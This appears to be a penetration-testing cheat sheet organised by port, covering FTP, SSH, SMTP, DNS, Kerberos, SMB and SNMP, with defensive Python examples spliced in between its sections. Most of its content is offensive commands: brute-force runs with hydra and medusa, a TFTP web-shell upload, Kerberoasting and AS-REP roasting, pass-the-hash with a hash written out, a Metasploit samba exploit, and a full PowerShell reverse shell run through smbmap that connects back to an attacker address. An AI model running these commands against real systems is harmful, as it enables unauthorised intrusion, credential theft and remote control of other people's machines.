
Exploitation by Port

After finding your target and enumerating it, it's now time for your initial access. This step is usually focused on exploiting a port/service open to you. There are tons of different ways to do this, as you can see from the guides and list below.
Keep in mind that just because you cannot completely exploit one service does not mean it won't be helpful. Certain services may hold interesting intel that helps you exploit something else, such as an open FTP server with anonymous auth that contains a few docs with valid usernames in them (you will find worse things).

Once you have your initial exploitation, you will essentially attempt a second round of it to escalate your privileges on the target box. Sometimes that can be done by getting initial access on another trusted box, or even via a service that is running internally on the loopback. Check everything, look everywhere, and don't forget the OSCP catchphrase: "try harder!"

Guides: Exploitation by Port

{% tabs %} {% tab title="General" %}
{% endtab %}

{% tab title="Linux" %}

  • Operator Handbook: Linux_Exploit pg. 127

{% endtab %}

{% tab title="MacOS" %}
{% endtab %}

{% tab title="Windows" %}
{% endtab %} {% endtabs %}

Exploit by Port

21 - FTP

{% tabs %} {% tab title="Use" %}

ftp> get [target file] 

{% endtab %}

{% tab title="Anonymous Access" %}

# ftp [target]
  • Username: anonymous
  • Password: anything

{% endtab %}

{% tab title="Enumeration" %}

$ nmap --script=ftp-* -p 21 $ip
$ nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip

{% endtab %}

{% tab title="Brute Force" %}

Hydra

$ hydra -l user -P /usr/share/john/password.lst ftp://$ip:21

Metasploit

$ msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login

{% endtab %} {% endtabs %}

22 - SSH

{% tabs %} {% tab title="Brute Force" %}

# medusa -M ssh -C /usr/share/wordlists/ssh.lst -H 22.txt -T 10 | grep SUCCESS | tee medusa-results.txt
# medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M [telnet|ssh]
# hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.47.138 ssh

{% endtab %} {% endtabs %}

23 - Telnet

{% tabs %} {% tab title="Telnet Brute" %}

# medusa -M telnet -C /usr/share/wordlists/telnet.lst -H 23.txt -T 10 -t 3 | grep SUCCESS | tee medusa-results.txt
# medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M [telnet|ssh]

{% endtab %}

{% tab title="Cisco Auditing Tool" %}

Perl script which scans Cisco routers for common vulnerabilities.

# CAT -h 192.168.99.230 -p 23 -a /usr/share/wordlists/nmap.lst

{% endtab %} {% endtabs %}

25 - SMTP

{% tabs %} {% tab title="Cmd Cheatsheet" %}

HELO - Identifies the client to the server (the original SMTP greeting).
EHLO - Extended SMTP greeting; the server replies with the extensions it supports.
STARTTLS - SMTP is unencrypted by default; starting a TLS session encrypts the rest of the dialog.
RCPT - Address of the recipient.
DATA - Starts the transfer of the message contents.
RSET - Used to abort the current email transaction.
MAIL - Specifies the email address of the sender.
QUIT - Closes the connection.
HELP - Asks for the help screen.
AUTH - Used to authenticate the client to the server.
VRFY - Asks the server to verify whether the email user's mailbox exists.
EXPN - Asks the server to expand a mailing list into its members.
>VRFY root
>EXPN root

{% endtab %}

{% tab title="User enum" %} https://www.kali.org/tools/smtp-user-enum/

# smtp-user-enum -M VRFY -U users.txt -t [ip]

MSF auxiliary/scanner/smtp/smtp_enum

msf> use auxiliary/scanner/smtp/smtp_enum

{% endtab %}

{% tab title="NMAP Enum" %}

$ nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 $ip

{% endtab %}

{% tab title="Brute Force" %}

$ hydra -P /usr/share/wordlists/nmap.lst $ip smtp -V

{% endtab %}

{% tab title="Open Relay Check" %}

telnet $ip 25
EHLO root
MAIL FROM:<[sender address]>
RCPT TO:<[external recipient address]>
DATA
Subject: Testing open mail relay.
Testing SMTP open mail relay. Have a nice day.
.
QUIT

{% endtab %}

{% tab title="SWAKS" %}

swaks (Swiss Army Knife SMTP) is a command-line tool written in Perl for testing SMTP setups; it supports STARTTLS and SMTP AUTH (PLAIN, LOGIN, CRAM-MD5, SPA, and DIGEST-MD5). swaks allows one to stop the SMTP dialog at any stage, e.g. to check RCPT TO: without actually sending a mail.

{% endtab %} {% endtabs %}
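The open relay check above can be scripted so that reply codes are parsed instead of read off a telnet screen. The following is an added example, not code from the original page or from swaks: it drives EHLO, MAIL FROM and RCPT TO, stops before DATA so nothing is ever queued, and reports whether an off-domain RCPT TO was accepted. It is written as a self-check of a mail server's relay policy; the hostnames, addresses and the two server transcripts are constructed.

```python
"""Open-relay self-check for an SMTP server (added example)."""
import io
import re
import socket

# An SMTP reply line is "<3-digit code><space or hyphen><text>";
# a hyphen marks a continuation line of a multi-line reply.
REPLY_RE = re.compile(r"^(\d{3})([ -])(.*)$")


def read_reply(rfile):
    """Read one complete SMTP reply and return (code, [text lines])."""
    lines = []
    while True:
        raw = rfile.readline()
        if not raw:
            raise ConnectionError("server closed the connection")
        line = raw.decode("ascii", "replace").rstrip("\r\n")
        match = REPLY_RE.match(line)
        if not match:
            raise ValueError("malformed SMTP reply: %r" % line)
        code, sep, text = int(match.group(1)), match.group(2), match.group(3)
        lines.append(text)
        if sep == " ":          # last line of the reply
            return code, lines


def relay_check(rfile, wfile, sender, recipient, helo="relaycheck.invalid"):
    """Walk EHLO -> MAIL FROM -> RCPT TO and record the reply code of each step.

    'open_relay' is True when RCPT TO for an off-domain recipient gets a 2xx
    reply, i.e. the server would relay for an unauthenticated client."""
    steps = {}

    def send(line):
        wfile.write((line + "\r\n").encode("ascii"))
        wfile.flush()
        return read_reply(rfile)

    steps["banner"], _ = read_reply(rfile)
    for command in ("EHLO " + helo,
                    "MAIL FROM:<%s>" % sender,
                    "RCPT TO:<%s>" % recipient):
        code, _ = send(command)
        steps[command.split(" ", 1)[0]] = code       # keys EHLO, MAIL, RCPT
        if code >= 400:                               # rejected: stop here
            break
    try:
        send("RSET")    # abort the transaction; DATA is never sent
        send("QUIT")
    except (ConnectionError, ValueError):
        pass            # some servers hang up right after a 5xx rejection
    steps["open_relay"] = steps.get("RCPT", 0) // 100 == 2
    return steps


def relay_check_tcp(host, port=25, **kwargs):
    """Run the check over a real TCP connection (not used by the offline test)."""
    with socket.create_connection((host, port), timeout=10) as sock:
        with sock.makefile("rb") as rfile, sock.makefile("wb") as wfile:
            return relay_check(rfile, wfile, **kwargs)


def relay_check_transcript(server_replies, **kwargs):
    """Run the check offline against a scripted list of server reply lines."""
    rfile = io.BytesIO("\r\n".join(server_replies).encode("ascii") + b"\r\n")
    return relay_check(rfile, io.BytesIO(), **kwargs)


# Constructed transcripts: a server that refuses relaying, and one that does not.
CLOSED_RELAY = [
    "220 mail.example.org ESMTP",
    "250-mail.example.org",
    "250 SIZE 10240000",
    "250 2.1.0 Ok",
    "550 5.7.1 <probe@example.net>: Relay access denied",
    "250 2.0.0 Ok",
    "221 2.0.0 Bye",
]
OPEN_RELAY = [
    "220 mail.example.org ESMTP",
    "250 mail.example.org",
    "250 2.1.0 Ok",
    "250 2.1.5 Ok",
    "250 2.0.0 Ok",
    "221 2.0.0 Bye",
]

if __name__ == "__main__":
    for name, transcript in (("closed", CLOSED_RELAY), ("open", OPEN_RELAY)):
        print(name, relay_check_transcript(transcript,
                                           sender="tester@relaycheck.invalid",
                                           recipient="probe@example.net"))
```

The verdict is taken from the RCPT TO reply alone: a server that accepts MAIL FROM but answers RCPT TO with 5xx for an outside recipient is behaving correctly, which is why the dialog is stopped there rather than judged on the greeting.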

47/1723 - PPTP

Point-to-Point Tunneling Protocol provides remote access for mobile devices; it uses TCP port 1723 for the control channel (including key exchange) and IP protocol 47 (GRE) to carry the encrypted data between peers.

{% tabs %} {% tab title="Enumeration" %}

$ nmap -Pn -sSV -p1723 $ip

{% endtab %}

{% tab title="Brute Force" %}

$ cat dic.txt | thc-pptp-bruter $ip

{% endtab %} {% endtabs %}

53 - DNS

{% tabs %} {% tab title="Enum Tools" %}

# dnsrecon -d [domain] -t axfr
# dnsenum [domain]

{% endtab %}

{% tab title="Cache Snooping" %} DNS Cache Snooping - You can use the simple 'dig' command to explore what is saved in the target DNS cache. Make sure you make these requests non-recursively (+norecurse) so you do not contaminate the current cache: a cached record comes back in the answer section, while an uncached name gets an empty answer because the server will not go out and resolve it.

  • Hacking: The Next Generation - DNS Cache Snooping, pg. 86

# dig @targetserver.example.com testdomain.com A +norecurse

{% endtab %} {% endtabs %}
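To see what +norecurse changes on the wire, and to recognise such probes in a resolver's own traffic, here is an added example that is not from the original page: it encodes and decodes the DNS header and question section. build_query(..., rd=False) produces the RD-cleared query that dig sends, classify_query labels an inbound query as recursive or non-recursive (the non-recursive kind from an outside address is the cache-snooping indicator), and cache_verdict interprets the reply the way the snooping check does. The domain name, transaction IDs and the response bytes are constructed.

```python
"""DNS header/question codec for cache-snooping queries (added example)."""
import secrets
import struct

# Flag bits of the 16-bit DNS flags word (RFC 1035, section 4.1.1)
QR, AA, RD, RA = 0x8000, 0x0400, 0x0100, 0x0080


def encode_name(name):
    """Encode 'testdomain.com' as length-prefixed labels ending in a zero byte."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(packet, offset):
    """Decode a (possibly compressed) name; returns (name, offset after it)."""
    labels, end, jumped = [], None, False
    while True:
        length = packet[offset]
        if length & 0xC0 == 0xC0:                 # compression pointer
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack("!H", packet[offset:offset + 2])[0] & 0x3FFF
            continue
        if length == 0:
            return ".".join(labels) + ".", (end if jumped else offset + 1)
        labels.append(packet[offset + 1:offset + 1 + length].decode("ascii"))
        offset += 1 + length


def build_query(name, qtype=1, rd=True, txid=None):
    """Build a single-question query; rd=False is what 'dig +norecurse' sends."""
    txid = secrets.randbelow(65536) if txid is None else txid
    header = struct.pack("!HHHHHH", txid, RD if rd else 0, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_header(packet):
    """Decode the 12-byte header into the fields the checks below need."""
    txid, flags, qd, an, _ns, _ar = struct.unpack("!HHHHHH", packet[:12])
    return {"id": txid, "qr": bool(flags & QR), "aa": bool(flags & AA),
            "rd": bool(flags & RD), "ra": bool(flags & RA),
            "rcode": flags & 0x000F, "qdcount": qd, "ancount": an}


def parse_question(packet):
    """Return (name, qtype, qclass) of the first question."""
    name, offset = decode_name(packet, 12)
    qtype, qclass = struct.unpack("!HH", packet[offset:offset + 4])
    return name, qtype, qclass


def classify_query(packet):
    """A query with RD cleared asks a resolver only for what it has cached."""
    header = parse_header(packet)
    if header["qr"]:
        raise ValueError("packet is a response, not a query")
    return "recursive" if header["rd"] else "non-recursive"


def cache_verdict(response):
    """Interpret the reply to a non-recursive query."""
    header = parse_header(response)
    if not header["qr"]:
        raise ValueError("packet is a query, not a response")
    if header["rcode"] != 0:
        return "error rcode %d" % header["rcode"]
    if header["aa"]:
        return "authoritative"   # server owns the zone; says nothing about its cache
    return "cached" if header["ancount"] > 0 else "not cached"
```

The same parse_header is what a resolver-side detection would run over captured queries: RD cleared and a source outside the resolver's client range is worth an alert, because ordinary stub resolvers always set RD.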

69 - TFTP

{% tabs %} {% tab title="Enumeration" %}

tftp [target] PUT local_file
tftp [target] GET example.txt

{% endtab %}

{% tab title="Shell Upload" %} If unauthenticated access is allowed with write permissions, you can upload a shell:

$ tftp $ip
tftp> ls
?Invalid command
tftp> verbose
Verbose mode on.
tftp> put shell.php
Sent 3605 bytes in 0.0 seconds [inf bits/sec]

{% endtab %} {% endtabs %}

79 - Finger

{% tabs %} {% tab title="User enumeration" %}

$ finger-user-enum.pl -U users.txt -t $ip

{% endtab %}

{% tab title="Command Execution" %}

# finger "/bin/ls -a /@domain.com"

{% endtab %} {% endtabs %}

80/443 - Web

{% tabs %} {% tab title="SSL/TLS" %} Open a connection

$ openssl s_client -connect $ip:443

Basic SSL ciphers check

$ nmap --script ssl-enum-ciphers -p 443 $ip

Look for unsafe ciphers such as Triple-DES and Blowfish.

A very complete tool for SSL auditing is testssl.sh; it finds BEAST, FREAK, POODLE, Heartbleed, etc.

{% endtab %} {% endtabs %}
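The manual step of looking for unsafe ciphers can be automated over the script's output. The following is an added example, not from the original page or from nmap: it parses ssl-enum-ciphers output into per-protocol suite lists and flags legacy protocol versions plus suites that use NULL, export-grade, anonymous, RC4, DES/3DES or MD5 components. The scan output embedded below is constructed, and the marker list is an assumption of this example rather than a complete policy.

```python
"""Weak-cipher audit over nmap ssl-enum-ciphers output (added example)."""
import re

# Substrings of IANA suite names that mark a suite as unsafe, with the reason.
WEAK_MARKERS = [
    ("_NULL_", "no encryption"),
    ("EXPORT", "export-grade (40/56-bit) key"),
    ("_anon_", "anonymous key exchange, server is not authenticated"),
    ("RC4", "RC4 stream cipher is broken"),
    ("3DES", "64-bit block cipher, SWEET32"),
    ("_DES_", "single DES, 56-bit key"),
    ("_MD5", "MD5-based MAC"),
]
LEGACY_PROTOCOLS = {"SSLv2", "SSLv3", "TLSv1.0", "TLSv1.1"}
PROTO_LINE = re.compile(r"^(SSLv\d|TLSv\d\.\d):$")


def parse_ssl_enum_ciphers(output):
    """Return {protocol: [suite names]} from the script's indented output."""
    suites, proto, in_ciphers = {}, None, False
    for raw in output.splitlines():
        line = raw.lstrip("|_ ").rstrip()   # strip nmap's "|" / "|_" margin
        if not line:
            continue
        if PROTO_LINE.match(line):
            proto, in_ciphers = line[:-1], False
            suites[proto] = []
        elif line == "ciphers:":
            in_ciphers = True
        elif line.endswith(":"):             # compressors:, warnings:, ...
            in_ciphers = False
        elif in_ciphers and proto and line.startswith(("TLS_", "SSL_")):
            suites[proto].append(line.split()[0])
    return suites


def audit_tls(suites):
    """Return (protocol, suite or None, reason) for every weak finding."""
    findings = []
    for proto, ciphers in suites.items():
        if proto in LEGACY_PROTOCOLS:
            findings.append((proto, None, "legacy protocol version offered"))
        for suite in ciphers:
            for marker, reason in WEAK_MARKERS:
                if marker in suite:
                    findings.append((proto, suite, reason))
                    break
    return findings


# Constructed sample of what the script prints for one host.
SAMPLE_SCAN = """\
PORT    STATE SERVICE
443/tcp open  https
| ssl-enum-ciphers:
|   TLSv1.0:
|     ciphers:
|       TLS_RSA_WITH_3DES_EDE_CBC_SHA (rsa 2048) - C
|       TLS_RSA_WITH_AES_128_CBC_SHA (rsa 2048) - A
|     compressors:
|       NULL
|     cipher preference: server
|     warnings:
|       64-bit block cipher 3DES vulnerable to SWEET32 attack
|   TLSv1.2:
|     ciphers:
|       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
|       TLS_RSA_WITH_RC4_128_SHA (rsa 2048) - C
|     compressors:
|       NULL
|     cipher preference: server
|_  least strength: C
"""

if __name__ == "__main__":
    for finding in audit_tls(parse_ssl_enum_ciphers(SAMPLE_SCAN)):
        print(finding)
```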

{% content-ref url="../../web-app-hacking/" %} web-app-hacking {% endcontent-ref %}

88/464 - Kerberos

Tools and Guides

{% tabs %} {% tab title="User Enum" %}

$ nmap -p88 --script krb5-enum-users --script-args krb5-enum-users.realm=research $ip

{% endtab %}

{% tab title="ASREPRoast" %}

ASREPRoast (accounts with Kerberos pre-authentication disabled):
impacket-GetNPUsers <domain_name>/<domain_user>:<domain_user_password> -request -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>
impacket-GetNPUsers <domain_name>/ -usersfile <users_file> -format <AS_REP_responses_format [hashcat | john]> -outputfile <output_AS_REP_responses_file>

Conda's AS-REP Roasting Video {% endtab %}

{% tab title="Kerberoast" %} Check for Kerberoastable accounts (user accounts with an SPN)

impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -dc-ip <IP>

Kerberoast Attack

impacket-GetUserSPNs <domain_name>/<domain_user>:<domain_user_password> -request -outputfile <output_TGSs_file>

{% endtab %}

{% tab title="OverPTH" %}

Overpass the hash/Pass-the-key

python3 getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
python3 getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python3 getTGT.py <domain_name>/<user_name>:[password]

{% endtab %}

{% tab title="Cmds w/ TGT" %}

python3 psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass
python3 wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

{% endtab %} {% endtabs %}
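On the defensive side, both roasting techniques above leave a log signature. The following is an added example, not from the original page or from impacket, that applies the usual rules to Windows Security events: event 4768 with pre-authentication type 0 and RC4 (0x17) ticket encryption for AS-REP roasting, and event 4769 with RC4 encryption for user (non-machine, non-krbtgt) SPNs for Kerberoasting, escalated to a burst alert when one source requests tickets for several distinct SPNs. The events and the burst threshold of 3 are constructed assumptions; real 4768/4769 records carry more fields, and AES-keyed accounts show etype 0x12 or 0x11 instead.

```python
"""AS-REP roasting and Kerberoasting indicators in Security events (added example)."""
from collections import defaultdict

# Windows Security log: 4768 = TGT request (AS-REQ), 4769 = service ticket
# request (TGS-REQ). Ticket encryption type 0x17 is RC4-HMAC, the etype both
# techniques ask for so that the returned hash is cheap to crack offline.
RC4_HMAC = "0x17"


def is_asrep_roast_indicator(ev):
    """Successful TGT issued without pre-authentication, RC4 etype."""
    return (ev.get("EventID") == 4768
            and ev.get("PreAuthType") == "0"
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and ev.get("Status", "0x0") == "0x0")


def is_kerberoast_indicator(ev):
    """RC4 service ticket for a user (not machine) SPN; krbtgt is excluded."""
    service = ev.get("ServiceName", "")
    return (ev.get("EventID") == 4769
            and ev.get("TicketEncryptionType", "").lower() == RC4_HMAC
            and not service.endswith("$")        # machine accounts end in '$'
            and service.lower() != "krbtgt"
            and ev.get("Status", "0x0") == "0x0")


def flag_roasting(events, burst_threshold=3):
    """Return alerts as tuples; a source requesting RC4 tickets for at least
    burst_threshold distinct user SPNs is additionally reported as a burst."""
    alerts = []
    spns_by_source = defaultdict(set)
    for ev in events:
        if is_asrep_roast_indicator(ev):
            alerts.append(("asrep-roast", ev.get("TargetUserName"), ev.get("IpAddress")))
        elif is_kerberoast_indicator(ev):
            alerts.append(("kerberoast-rc4-tgs", ev["ServiceName"], ev.get("IpAddress")))
            spns_by_source[ev.get("IpAddress")].add(ev["ServiceName"])
    for source, spns in spns_by_source.items():
        if len(spns) >= burst_threshold:
            alerts.append(("kerberoast-burst", source, tuple(sorted(spns))))
    return alerts


# Constructed events carrying only the fields the rules need.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc_backup", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.0.0.50"},
    {"EventID": 4768, "TargetUserName": "alice", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "ServiceName": "svc_web", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "ServiceName": "svc_ftp", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.0.0.50"},
    {"EventID": 4769, "ServiceName": "WS01$", "TicketEncryptionType": "0x17",
     "Status": "0x0", "IpAddress": "10.0.0.21"},
    {"EventID": 4769, "ServiceName": "svc_sql", "TicketEncryptionType": "0x12",
     "Status": "0x0", "IpAddress": "10.0.0.21"},
]

if __name__ == "__main__":
    for alert in flag_roasting(SAMPLE_EVENTS):
        print(alert)
```

A single RC4 service ticket is not proof of anything (legacy accounts still negotiate RC4), which is why the per-event alerts are kept low severity and the burst over distinct SPNs from one source carries the weight.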

{% content-ref url="active-directory.md" %} active-directory.md {% endcontent-ref %}

110 - Pop3

Just telnet it.

111 - RPCbind or Portmapper

{% tabs %} {% tab title="Enumeration" %} Nmap scripts

# nmap -sV -p 111 --script=rpcinfo [target]
# nmap -p 111 --script nfs* [target]

Impacket tool RPCdump.py

# rpcdump.py username:password@IP_Address port/protocol (e.g. 80/HTTP)

{% endtab %}

{% tab title="Connect" %}

Connect to RPC

Null Connect

 #rpcclient -U "" [target]

Mount discovered NFS directory

# sudo mount -o nolock [ip]:/dir ~/yourdir/

{% endtab %}

{% tab title="Post Connection Commands" %}

srvinfo
enumdomusers
getdompwinfo
querydominfo
netshareenum
netshareenumall

{% endtab %}

{% tab title="Resources" %}
{% endtab %} {% endtabs %}

113 - Ident Service

  • ident-user-enum - A simple Perl script to query the ident service (113/TCP) in order to determine the owner of the process listening on each TCP port of a target system.

123 - NTP

Enumeration

#ntpdc -c monlist [target]
#ntpdc -c sysinfo [target]
#ntpq

135 - RPC

{% tabs %} {% tab title="Enumeration" %} Enumerate RPC services; shows whether any NFS mount is exposed

$ rpcinfo -p $ip
$ nmap $ip --script=msrpc-enum

# Endpoint Mapper Service Discovery
msf > use auxiliary/scanner/dcerpc/endpoint_mapper
# Hidden DCERPC Service Discovery
msf > use auxiliary/scanner/dcerpc/hidden
# Remote Management Interface Discovery
msf > use auxiliary/scanner/dcerpc/management
# DCERPC TCP Service Auditor
msf > use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
msf > use exploit/windows/dcerpc/ms03_026_dcom

{% endtab %}

{% tab title="Resources" %}
{% endtab %} {% endtabs %}

137-139/445 - SMB/NetBIOS

{% tabs %} {% tab title="Enum" %}

nmblookup -A 10.11.1.111

NSE Enumeration

#nmap -p 135-139,445 -vv --script=smb-enum* 10.10.10.10

SMB Users & Shares Scan

nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10

https://github.com/cddmp/enum4linux-ng/

enum4linux -a 10.10.10.10

nbtscan

#nbtscan [target]

{% endtab %}

{% tab title="Get Version" %}

smbver.sh 10.11.1.111
msfconsole; use scanner/smb/smb_version
ngrep -i -d tap0 's.?a.?m.?b.?a.*[[:digit:]]'
smbclient -L \\\\10.11.1.111

{% endtab %}

{% tab title="Get Shares" %}

smbmap -H 10.11.1.111 -R
echo exit | smbclient -L \\\\10.11.1.111
smbclient \\\\10.11.1.111\\
smbclient -L //10.11.1.111 -N
nmap --script smb-enum-shares -p139,445 -T4 -Pn 10.11.1.111
smbclient -L \\\\10.11.1.111\\
# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"
smbclient -L //10.11.1.111/ --option='client min protocol=NT1'

{% endtab %}

{% tab title="137-Dump NBT Table" %}

$ nmap -Pn -sUC -p137 $ip

{% endtab %}

{% tab title="SMB NMAP Scan" %}

# locate *.nse | grep smb
# nmap -p 139,445 --script=smb-vuln* [target]

{% endtab %} {% endtabs %}

{% tabs %} {% tab title="Null connect" %}

smbmap -H 10.11.1.111
rpcclient -U "" 10.10.10.10
smbclient //10.11.1.111/IPC$ -N

# Enumerate over the null session
enum4linux -a 10.11.1.111
enum4linux-ng.py 10.11.1.111 -A -C
/usr/share/doc/python3-impacket/examples/samrdump.py 10.11.1.111

{% endtab %}

{% tab title="SMBClient" %}

 #smbclient //[ip]/[sharename] -U user -p port
 #smbclient //[ip]/[sharename] -U Anonymous -N   # -N: do not prompt for a password

Pull down files

/> mget *

{% endtab %}

{% tab title="SMB Brute force" %}

#medusa -h <host.ip> -u <account.name> -P /path/to/wordlist -M smbnt

{% endtab %}

{% tab title="SMBMap" %}

smbmap.py -H 10.11.1.111 -u administrator -p asdf1234 #Enum
smbmap.py -u username -p 'P@$$w0rd1234!' -d DOMAINNAME -x 'net group "Domain Admins" /domain' -H 10.11.1.111 #RCE
smbmap.py -H 10.11.1.111 -u username -p 'P@$$w0rd1234!' -L # Drive Listing
smbmap.py -u username -p 'P@$$w0rd1234!' -d ABC -H 10.11.1.111 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"' # Reverse Shell

{% endtab %}

{% tab title="CrackMapExec" %}

crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local
crackmapexec smb 10.55.100.0/23 -u LA-ITAdmin -H 573f6308519b3df23d9ae2137f549b15 --local --lsa

{% endtab %}

{% tab title="SMBeagle" %}

SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports whether each file can be read and/or written. All findings are streamed out to a CSV file, an Elasticsearch host, or both.

{% endtab %} {% endtabs %}

Impacket Scripts
  • https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/
  • psexec.py: PSEXEC like functionality example using RemComSvc (https://github.com/kavika13/RemCom).
  • smbexec.py: A similar approach to PSEXEC w/o using RemComSvc. The technique is described here. Our implementation goes one step further, instantiating a local smbserver to receive the output of the commands. This is useful in the situation where the target machine does NOT have a writeable share available.
  • atexec.py: This example executes a command on the target machine through the Task Scheduler service and returns the output of the executed command.
  • wmiexec.py: A semi-interactive shell, used through Windows Management Instrumentation. It does not require to install any service/agent at the target server. Runs as Administrator. Highly stealthy.
  • dcomexec.py: A semi-interactive shell similar to wmiexec.py, but using different DCOM endpoints. Currently supports MMC20.Application, ShellWindows and ShellBrowserWindow objects.
  • smbclient.py: A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. It's an excellent example to see how to use impacket.smb in action.
  • addcomputer.py: Allows adding a computer to a domain using LDAP or SAMR (SMB).
  • getArch.py: This script will connect against a target (or list of targets) machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.
  • ifmap.py: This script will bind to the target's MGMT interface to get a list of interface IDs. It will use that list on top of another list of interface UUIDs seen in the wild, trying to bind to each interface, and reports whether the interface is listed and/or listening.
  • lookupsid.py: A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
  • netview.py: Gets a list of the sessions opened at the remote hosts and keeps track of them, looping over the hosts found and recording who logged in/out from remote servers.
  • opdump.py: This binds to the given hostname:port and MSRPC interface. Then, it tries to call each of the first 256 operation numbers in turn and reports the outcome of each call.
  • reg.py: Remote registry manipulation tool through the [MS-RRP] MSRPC Interface. The idea is to provide similar functionality as the REG.EXE Windows utility.
  • rpcdump.py: This script will dump the list of RPC endpoints and string bindings registered at the target. It will also try to match them with a list of well known endpoints.
  • samrdump.py: An application that communicates with the Security Account Manager Remote interface from the MSRPC suite. It lists system user accounts, available resource shares and other sensitive information exported through this service.
  • services.py: This script can be used to manipulate Windows services through the [MS-SCMR] MSRPC Interface. It supports start, stop, delete, status, config, list, create and change.
Metasploit

Version

msfconsole; use scanner/smb/smb_version; set RHOSTS $ip; run

MultiExploit

msfconsole; use exploit/multi/samba/usermap_script; set lhost 192.168.0.X; set rhost $ip; run
161/162 - SNMP

Basic SNMP Info
  • Default community strings
    • public, private, cisco (cable-docsis, ILMI)
  • Windows NT MIB codes

    • .1.3.6.1.2.1.1.5 Hostnames
    • .1.3.6.1.4.1.77.1.4.2 Domain Name
    • .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
    • .1.3.6.1.4.1.77.1.2.27 Share Information

Fix SNMP outputs to be human readable

# apt-get install snmp-mibs-downloader && download-mibs
# echo "" > /etc/snmp/snmp.conf

{% tabs %} {% tab title="Enum" %} Brute force community string check, find SNMP services.

onesixtyone - onesixtyone is a simple SNMP scanner which sends SNMP requests for the sysDescr value asynchronously with user-adjustable sending times and then logs the responses which gives the description of the software running on the device.

# onesixtyone -c community.list -i hosts.list
$ snmpenum $ip public windows.txt

Enumerating the entire MIB tree

https://linux.die.net/man/1/snmpwalk

# snmpwalk -c [community string] -v1 -t 10 [target]

Enumerate Specific MIB Code

# snmpwalk -c [community string] -v1 [target] [MIB code]

Metasploit Aux scanner - snmp_enum

msf> use auxiliary/scanner/snmp/snmp_enum
msf> set RHOSTS [target]

{% endtab %}

{% tab title="BRAA" %}

BRAA - Mass SNMP Scanning

# braa [community string]@[target]:.1.3.6.*

{% endtab %}

{% tab title="Com string Brute force" %}

msf5> use auxiliary/scanner/snmp/snmp_login
#onesixtyone -c [wordlist] [target]
# nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]

{% endtab %}

{% tab title="SNMPv3" %} Enumeration

#nmap -sV -p 161 --script=snmp-info TARGET-SUBNET
# apt-get install snmp snmp-mibs-downloader
